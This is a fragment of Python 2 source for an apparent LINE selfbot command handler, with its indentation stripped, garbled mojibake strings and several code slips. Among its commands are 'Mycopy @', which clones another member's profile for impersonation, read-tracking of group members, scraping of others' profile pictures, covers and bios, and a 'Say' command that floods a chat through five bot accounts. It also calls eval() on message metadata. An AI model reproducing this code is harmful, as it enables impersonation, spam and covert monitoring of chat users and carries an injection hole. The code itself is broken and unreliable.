wait['group'] = False
cl.sendText(msg.to,"ปิดข้อความ")
elif msg.text in ["Sambutan on"]:
if wait["Sambutan"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sambutan Di Aktifkanヾ(*´∀`*)ノ")
else:
wait["Sambutan"] = True
wait["joinkick"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah Onヽ(´▽`)/")
elif msg.text in ["Sambutan off"]:
if wait["Sambutan"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sambutan Di Nonaktifkan( ^∇^)")
else:
wait["Sambutan"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah Off(p′︵‵。)")
elif msg.text.lower() == 'join on':
if msg.from_ in admin:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ini sudah off 👈")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka ô€¨👈")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ออโต้เข้ากลุ่มเปิด🌟")
else:
cl.sendText(msg.to,"It is already On ô€¨")
elif msg.text in ["Allprotect on","Panick:on"]:
if msg.from_ in admin:
if wait["inviteprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ล็อคเชิญเปิด🌟")
else:
cl.sendText(msg.to,"🌟ล็อคเชิญเปิด🌟")
else:
wait["inviteprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ล็อคเชิญเปิด🌟")
if wait["cancelprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ล็อคยกเลิกเชิญเปิด🌟")
else:
cl.sendText(msg.to,"🌟ล็อคยกเลิกเชิญเปิด🌟")
else:
wait["cancelprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ล็อคยกเลิกเชิญเปิด🌟")
if wait["protect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ป้องกันเปิด🌟")
else:
cl.sendText(msg.to,"🌟ป้องกันเปิด🌟")
else:
wait["protect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ป้องกันเปิด🌟")
else:
cl.sendText(msg.to,"🌟ป้องกันเปิด🌟")
if wait["linkprotect"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ล็อคลิ้งคิวอาร์โค้ตเปิด🌟")
else:
cl.sendText(msg.to,"🌟ล็อคลิ้งคิวอาร์โค้ตเปิด🌟")
else:
wait["linkprotect"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"🌟ล็อคลิ้งคิวอาร์โค้ตเปิด🌟")
else:
cl.sendText(msg.to,"🌟ล็อคลิ้งคิวอาร์โค้ตเปิด🌟")
elif msg.text in ["Allprotect off","Panick:off"]:
if msg.from_ in admin:
if wait["inviteprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ล็อคเชิญปิด✨")
else:
cl.sendText(msg.to,"✨ล็อคเชิญปิด✨")
else:
wait["inviteprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ล็อคเชิญปิด✨")
if wait["cancelprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ป้องกันยกเลิกเชิญปิด✨")
else:
cl.sendText(msg.to,"✨ป้องกันยกเลิกเชิญปิด✨")
else:
wait["cancelprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ป้องกันยกเลิกเชิญปิด✨")
if wait["protect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ป้องกันปิด✨")
else:
cl.sendText(msg.to,"✨ป้องกันปิด✨")
else:
wait["protect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ป้องกันปิด✨")
else:
cl.sendText(msg.to,"✨ป้องกันปิด✨")
if wait["linkprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ล็อคลิ้งคิวอาร์โค้ตปิด✨")
else:
cl.sendText(msg.to,"✨ล็อคลิ้งคิวอาร์���ค้ต���ิด✨")
else:
wait["linkprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ล็อคลิ้���คิวอาร์โค้ต���ิด✨")
else:
cl.sendText(msg.to,"✨ล็อคลิ้งคิวอาร���โค้ต���ิด✨")
elif msg.text.lower() == 'join off':
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ออโต้เข้ากลุ่มปิด✨")
else:
cl.sendText(msg.to,"✨ออโต้เข้ากลุ่มปิด✨")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ออโต้เข้ากลุ่มปิด✨")
else:
cl.sendText(msg.to,"✨ออโต้เข้ากลุ่มปิด✨")
elif msg.text in ["Protect off"]:
if wait["protect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ป้องกันปิด���")
else:
cl.sendText(msg.to,"✨ป้องกันปิด✨")
else:
wait["protect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ป้องกันปิด✨")
else:
cl.sendText(msg.to,"✨ป้องกันปิด✨")
elif msg.text in ["Qrprotect off","qrprotect off"]:
if wait["linkprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ล็อคลิ้งคิวอาร์โค้ตปิด✨")
else:
cl.sendText(msg.to,"✨ล็อคลิ้งคิวอาร์โค้ตปิด✨")
else:
wait["linkprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ล็อคลิ้งคิวอาร์โค้ตปิด✨")
else:
cl.sendText(msg.to,"✨ล็อคลิ้งคิวอาร์โค้ตปิด✨")
elif msg.text in ["Inviteprotect off"]:
if wait["inviteprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ป้องกันเชิญปิด✨")
else:
cl.sendText(msg.to,"✨ป้องกันเชิญปิด✨")
else:
wait["inviteprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ป้องกันเชิญปิด✨")
else:
cl.sendText(msg.to,"✨ป้องกันเชิญปิด✨")
elif msg.text in ["Cancelprotect off"]:
if wait["cancelprotect"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ป้องกันยกเลิกเชิญปิด✨")
else:
cl.sendText(msg.to,"✨ป้องกันยกเลิกเชิญปิด✨")
else:
wait["cancelprotect"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"✨ป้องกันยกเลิกเชิญปิด✨")
else:
cl.sendText(msg.to,"✨ป้องกันยกเลิกเชิญปิด✨")
elif "Gcancel:" in msg.text:
if msg.from_ in admin:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"关了邀请拒绝。要时开请指定人数发送")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + " The group of people and below decided to automatically refuse invitation")
else:
cl.sendText(msg.to,strnum + "使人以下的小组用自动邀请拒绝")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["Leave on","Auto leave: on"]:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"on👈")
else:
cl.sendText(msg.to,"Sudah terbuka ")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done👈")
else:
cl.sendText(msg.to,"Is already open👈")
elif msg.text in ["Leave off","Auto leave: off"]:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"on👈")
else:
cl.sendText(msg.to,"Sudah off👈")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done👈")
else:
cl.sendText(msg.to,"Is already close👈")
elif msg.text in ["Share on","share on"]:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done ")
else:
cl.sendText(msg.to,"Hal ini sudah terbuka👈")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"on👈")
else:
cl.sendText(msg.to,"on👈")
elif msg.text in ["Share off","share off"]:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done👈")
else:
cl.sendText(msg.to,"It is already turned off 👈")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Off👈")
else:
cl.sendText(msg.to,"Off👈")
elif msg.text in ["Welcome:on"]:
if msg.from_ in admin:
if wait["welcomemsg"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["welcomesg"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message on")
elif msg.text in ["Welcome:off"]:
if msg.from_ in admin:
if wait["welcomemsg"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["welcomemsg"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text.lower() == 'set':
md = ""
if wait["contact"] == True: md+="☞ คอนแทค → ✔\n"
else: md+="🔚 คอนแทค → ❎\n"
if wait["autoJoin"] == True: md+="☞ ออโต้เข้ากลุ่ม → ✔\n"
else: md+="🔚 ออโต้เข้ากลุ่ม → ❎\n"
if wait["autoCancel"]["on"] == True:md+="☞ ยกเลิกเชิญกลุ่ม: " + str(wait["autoCancel"]["members"]) + " → ✔\n"
else: md+="🔚 ยกเลิกเชิญกลุ่ม → ❎\n"
if wait["leaveRoom"] == True: md+="☞ ออโต้ออกแชทรวม → ✔\n"
else: md+="🔚 ออโต้ออกแชทรวม → ❎\n"
if wait["timeline"] == True: md+="☞ แชร์ลิ้ง → ✔\n"
else:md+="🔚 แชร์ลิ้ง → ❎\n"
if wait["autoAdd"] == True: md+="☞ ออโต้แอด → ✔\n"
else:md+="🔚 ออโต้แอด → ❎\n"
if wait["commentOn"] == True: md+="☞ Auto komentar → ✔\n"
else:md+="🔚 Auto komentar → ❎\n"
if wait["protect"] == True: md+="☞ ป้องกัน → ✔\n"
else:md+="🔚 ป้องกัน → ❎\n"
if wait["linkprotect"] == True: md+="☞ ป้องกันลิ้ง → ✔\n"
else:md+="🔚 ป้องกันลิ้ง → ❎\n"
if wait["inviteprotect"] == True: md+="☞ ป้องกันเขิญ → ✔\n"
else:md+="🔚 ป้องกันเชิญ → ❎\n"
if wait["cancelprotect"] == True: md+="☞ ป้องกันยกเลิกเชิญ → ✔\n"
else:md+="🔚 ป้องกันยกเลิกเชิญ → ❎\n"
if wait["likeOn"] == True: md+="☞ ออโต้ไลค์ → ✔\n"
else:md+="🔚 ออโต้ไลค์ → ❎\n"
if wait["group"] == True: md+="☞ เปิดข้อความต้อนรับ → ✔\n"
else:md+="🔚 เปิดข้อความต้อนรับ → ❎\n"
if wait["Sambutan"] == True: md+="☞ เปิดโชว์คอนแทค → ✔\n"
else:md+="🔚 เปิดโชว์คอนแทค → ❎\n" + datetime.now().strftime('\n📅%Y/%m/%d 🕛 %H:%M:%S')
cl.sendText(msg.to,md)
msg.contentType = 13
msg.contentMetadata = {'mid': admsa}
cl.sendMessage(msg)
elif msg.text in ["Like on"]:
if wait["likeOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done。")
else:
wait["Like on"] = True
if wait["likeOn"] == "JP":
cl.sendText(msg.to,"Already。")
elif msg.text in ["Like off"]:
if wait["likeOff"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done。")
else:
wait["likeOff"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already。")
elif msg.text in ["Add on","Add auto on"]:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already On")
else:
cl.sendText(msg.to,"Already On👈")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already On👈")
else:
cl.sendText(msg.to,"Already On👈")
elif msg.text in ["Add off","Add auto off"]:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Hal ini sudah off👈")
else:
cl.sendText(msg.to,"Hal ini sudah dimatikan👈")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already Off👈")
else:
cl.sendText(msg.to,"Untuk mengaktifkan-off👈")
elif "Message set: " in msg.text:
wait["message"] = msg.text.replace("Message set: ","")
cl.sendText(msg.to,"We changed the message👈")
elif "Help set: " in msg.text:
wait["help"] = msg.text.replace("Help set: ","")
cl.sendText(msg.to,"We changed the Help👈")
elif "Pesan add: " in msg.text:
wait["message"] = msg.text.replace("Pesan add: ","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kami mengubah pesan🛡")
else:
cl.sendText(msg.to,"Change information")
elif msg.text in ["Pesan add cek","Message Confirmation"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Additional information is automatically set to the following \n\n" + wait["message"])
else:
cl.sendText(msg.to,"Pesan tambahan otomatis telah ditetapkan sebagai berikut \n\n" + wait["message"])
elif msg.text in ["Change","change"]:
if wait["lang"] =="JP":
wait["lang"] = "TW"
cl.sendText(msg.to,"I changed the language to engglis👈")
else:
wait["lang"] = "JP"
cl.sendText(msg.to,"I changed the language to indonesia👈")
elif "Message set: " in msg.text:
c = msg.text.replace("Message set: ","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"Is a string that can not be changed👈")
else:
wait["comment"] = c
cl.sendText(msg.to,"This has been changed👈\n\n" + c)
elif "Comment set: " in msg.text:
c = msg.text.replace("Comment set: ","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"Merupakan string yang tidak bisa diubah👈")
else:
wait["comment"] = c
cl.sendText(msg.to,"Ini telah diubah👈\n\n" + c)
elif msg.text in ["Com on","Com:on","Comment on"]:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Aku berada di👈")
else:
cl.sendText(msg.to,"To open👈")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"オンã«ã—ã¾ã—ãŸ👈")
else:
cl.sendText(msg.to,"è¦äº†å¼€👈")
elif msg.text in ["Com off"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Hal ini sudah off")
else:
cl.sendText(msg.to,"It is already turned off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Off👈")
else:
cl.sendText(msg.to,"To turn off")
elif "Com1:" in msg.text:
if msg.from_ in admin:
wait["Comment1"] = msg.text.replace("Update welcome:","")
cl.sendText(msg.to,"update welcome message succes"+ datetime.today().strftime('%H:%M:%S'))
elif "Update welcome:" in msg.text:
if msg.from_ in admin:
wait["welmsg"] = msg.text.replace("Update welcome:","")
cl.sendText(msg.to,"update welcome message succes"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Check welcome message"]:
if msg.from_ in admin:
if wait["lang"] == "JP":
cl.sendText(msg.to,"yor bot message\n\n" + wait["welmsg"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["welmsg"])
elif msg.text in ["Com","Comment"]:
cl.sendText(msg.to,"Auto komentar saat ini telah ditetapkan sebagai berikut:👈\n\n" + str(wait["comment"]))
elif msg.text in ["Com Bl"]:
wait["wblack"] = True
cl.sendText(msg.to,"Please send contacts from the person you want to add to the blacklistô€œô€…”👈")
elif msg.text in ["Com hapus Bl"]:
wait["dblack"] = True
cl.sendText(msg.to,"Please send contacts from the person you want to add from the blacklistô€œô€…”👈")
elif msg.text in ["Com Bl cek"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"Nothing in the blacklistô€œ🛡")
else:
cl.sendText(msg.to,"The following is a blacklistô€œ👈")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "・" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text.lower() == 'jam on':
if wait["clock"] == True:
cl.sendText(msg.to,"Sudah On")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"👉Jam on👈")
elif msg.text.lower() == 'jam off':
if wait["clock"] == False:
cl.sendText(msg.to,"Hal ini sudah off🛡")
else:
wait["clock"] = False
cl.sendText(msg.to,"Adalah Off")
elif "Jam say: " in msg.text:
n = msg.text.replace("Jam say: ","")
if len(n.decode("utf-8")) > 30:
cl.sendText(msg.to,"terlalu lama")
else:
wait["cName"] = n
cl.sendText(msg.to,"Ini telah diubah🛡\n\n" + n)
elif msg.text.lower() == 'update':
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Diperbarui👈")
else:
cl.sendText(msg.to,"Silahkan Aktifkan Nama")
elif msg.text in ["Point","นับ"]:
if msg.toType == 2:
cl.sendText(msg.to, "ตั้งจุดเช็คคนอ่าน:" + datetime.now().strftime('\n📅%Y/%m/%d 🕛 %H:%M:%S'))
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('📅%Y-%m-%d 🕛 %H:%M:%S')
wait2['ROM'][msg.to] = {}
print wait2
elif msg.text in ["Read","อ่าน"]:
if msg.toType == 2:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "==============================\nActive readers:%s\n\n\n\nPassive readers:\n%s\n\n==============================\nIn the last seen point:\n[%s]\n==============================\n Powered By: kieselfbotline" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
print "ReadPoint Set..."
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('📅%Y-%m-%d 🕛 %H:%M:%S')
wait2['ROM'][msg.to] = {}
print wait
cl.sendText(msg.to, "Auto set reading point in:" + datetime.now().strftime('\n📅%Y-%m-%d 🕛 %H:%M:%S'))
else:
cl.sendText(msg.to, "Reading point has not been set.")
#=================================================
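# Thai aliases of the read-point feature above: "แอบ" (lurk) sets a checkpoint and
# "ออกมา" (come out) reports who has read messages since that checkpoint, using the
# readPoint/readMember/ROM maps in wait2.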
elif msg.text == "แอบ":
cl.sendText(msg.to, "Set point.")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%Y-%m-%d %H:%M')
wait2['ROM'][msg.to] = {}
print wait2
elif msg.text == "ออกมา":
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "╔═══════════════%s\n╠════════════════\n%s╠═══════════════\n║Readig point creation:\n║ [%s]\n╚════════════════" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "Ketik Lurking dulu dudul Baru bilang result Point.")
#-----------------------[Add Staff Section]------------------------
elif "Add staff @" in msg.text:
if msg.from_ in admin:
print "[Command]Staff add executing"
_name = msg.text.replace("Add staff @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.append(target)
cl.sendText(msg.to,"Added to the staff list")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif "Remove staff @" in msg.text:
if msg.from_ in admin:
print "[Command]Staff remove executing"
_name = msg.text.replace("Remove staff @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
staff.remove(target)
cl.sendText(msg.to,"Removed to the staff list")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"Admin permission required.")
elif msg.text in ["Stafflist","adminlist"]:
if staff == []:
cl.sendText(msg.to,"The stafflist is empty")
else:
cl.sendText(msg.to,"Staff list: ")
mc = ""
for mi_d in staff:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
print "[Command]Stafflist executed"
#-----------------------------------------------------------
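# Sends the group creator's contact card followed by a short caption.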
elif msg.text in ["Group creator","Gc","Gcreator","gcreator"]:
ginfo = cl.getGroup(msg.to)
gCreator = ginfo.creator.mid
msg.contentType = 13
msg.contentMetadata = {'mid': gCreator}
cl.sendMessage(msg)
cl.sendText(msg.to,"""╔══════════════
💥ผู้สร้างกลุ่ม Creator 💥Group""")
#staff-----------------------------------------------------------
elif "Getname" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
except:
cl.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
elif "Getprofile" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
cl.sendText(msg.to,"💗ชื่อ💗 :\n" + contact.displayName + "\n\n💗สเตตัส💗 :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithURL(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithURL(msg.to,path)
except:
pass
elif "Getcontact" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = cl.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
cl.sendMessage(msg)
elif "Getinfo" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\nHeader :\n" + str(cu))
except:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\n" + str(cu))
elif "Getbio" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
except:
cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
#----------------------------------------------------
elif "Mycopy @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Mycopy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
cl.cloneContactProfile(target)
cl.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
#=================================================
elif msg.text in ["Mybackup"]:
try:
cl.updateDisplayPicture(mybackup.pictureStatus)
cl.updateProfile(mybackup)
cl.sendText(msg.to, "Backup Sukses Bosqu")
except Exception as e:
cl.sendText(msg.to, str (e))
#-------------------------------- PP BY TAG ---------------------------------
elif "Lo @" in msg.text:
if msg.toType == 2:
cover = msg.text.replace("Cover @","")
_nametarget = cover.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
h = cl.channel.getHome(target)
objId = h["result"]["homeInfo"]["objectId"]
cl.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/myhome/c/download.nhn?userid=" + target + "&oid=" + objId)
except Exception as error:
print error
cl.sendText(msg.to,"Upload image failed.")
elif "pp @" in msg.text:
if msg.toType == 2:
cover = msg.text.replace("pp @","")
_nametarget = cover.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
h = cl.getContact(target)
cl.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
xname = cl.getContact(msg.from_).displayName
cl.sendText(msg.to,"Kepo Kaka Yaa "+xname+"\n (`・ω・´)\n \n" + datetime.now().strftime('%H:%M:%S'))
except Exception as error:
print error
cl.sendText(msg.to,"Upload image failed.")
elif "Pp @" in msg.text:
if msg.toType == 2:
cover = msg.text.replace("Pp @","")
_nametarget = cover.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Not found")
else:
for target in targets:
try:
h = cl.getContact(target)
cl.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
except Exception as error:
print error
cl.sendText(msg.to,"Upload image failed.")
elif msg.text.lower() in ["pap owner","pap creator"]:
cl.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/0hQHBfiuxIDmd_HyI5amNxMENaAAoIMQgvBywTVFNIAgRTLk9kRHBCAlkcAFMGKkBiS3hAUQgbBVFU")
#----------------------------------------------------------------------
elif msg.text in ["Rejectall"]:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Completion。")
ki.sendText(msg.to,"Completion。")
ki2.sendText(msg.to,"Completion。")
ki3.sendText(msg.to,"Completion。")
ki4.sendText(msg.to,"Completion。")
ki5.sendText(msg.to,"💟ทำการลบห้องรันหมดแล้ว💟")
else:
cl.sendText(msg.to,"key is wrong。")
#----------------------------------------------------------------
elif msg.text in ["Reject","ลบรัน"]:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปฏิเสทคำเชิญเข้ากลุ่มทั้งหมดเรียบร้อย")
else:
cl.sendText(msg.to,"key is wrong")
elif msg.text in ["Reject1","ลบรัน1"]:
gid = ki.getGroupIdsInvited()
for i in gid:
ki.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki.sendText(msg.to,"ปฏิเสทค้างเชิญเรียบร้อย")
else:
ki.sendText(msg.to,"key is wrong")
#========================================
elif msg.text.lower() == 'welcome':
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
cl.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name))
cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName )
#=========================================
elif "Say " in msg.text:
string = msg.text.replace("Say ","")
if len(string.decode('utf-8')) <= 50:
ki.sendText(msg.to," " + string + " ")
ki2.sendText(msg.to," " + string + " ")
ki3.sendText(msg.to," " + string + " ")
ki4.sendText(msg.to," " + string + " ")
ki5.sendText(msg.to," " + string + " ")
ki.sendText(msg.to," " + string + " ")
ki2.sendText(msg.to," " + string + " ")
ki3.sendText(msg.to," " + string + " ")
ki4.sendText(msg.to," " + string + " ")
ki5.sendText(msg.to," " + string + " ")
ki.sendText(msg.to," " + string + " ")
ki2.sendText(msg.to," " + string + " ")
ki3.sendText(msg.to," " + string + " ")
ki4.sendText(msg.to," " + string + " ")
ki5.sendText(msg.to," " + string + " ")
#-----------------------------------------------
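# YouTube helpers: "vdo:" relies on a yt() search function assumed to be defined elsewhere
# in the script, while "Youtube " scrapes the results page with urllib2 + BeautifulSoup and
# replies with the first video link it finds.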
elif "vdo:" in msg.text.lower():
if msg.toType == 2:
query = msg.text.split(":")
try:
if len(query) == 3:
isi = yt(query[2])
hasil = isi[int(query[1])-1]
cl.sendText(msg.to, hasil)
else:
isi = yt(query[1])
cl.sendText(msg.to, isi[0])
except Exception as e:
cl.sendText(msg.to, str(e))
elif 'Youtube ' in msg.text:
try:
textToSearch = (msg.text).replace('Youtube ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
